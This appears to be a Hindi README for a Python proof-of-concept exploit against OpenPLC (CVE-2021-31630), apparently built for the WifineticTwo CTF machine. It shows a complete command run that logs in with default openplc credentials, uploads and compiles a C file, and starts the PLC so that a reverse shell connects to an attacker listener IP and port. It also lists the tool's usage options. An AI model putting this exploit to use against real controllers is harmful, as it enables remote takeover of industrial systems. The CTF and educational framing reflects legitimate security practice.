
CVE-2021-31630 के लिए POC एक्सप्लॉइट पायथन3 में लिखा गया है और गैर-अवरुद्ध मोड के साथ C रिवर्स शेल का उपयोग करता है
यह एक्सप्लॉइट Fellipe Oliveira द्वारा बनाए गए Exploit-DB के एक्सप्लॉइट पर आधारित है।
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>
विकल्प:
--url - OpenPLC का URL--username - उपयोगकर्ता नाम--password - पासवर्ड--listenerip - श्रोता का IP पता--listenerport - श्रोता का पोर्टनोट: यह एक्सप्लॉइट एक PoC के रूप में बनाया गया है; इसका उपयोग केवल शैक्षिक उद्देश्यों या CTFs के लिए करें - https://flojboj.org/article/WifineticTwo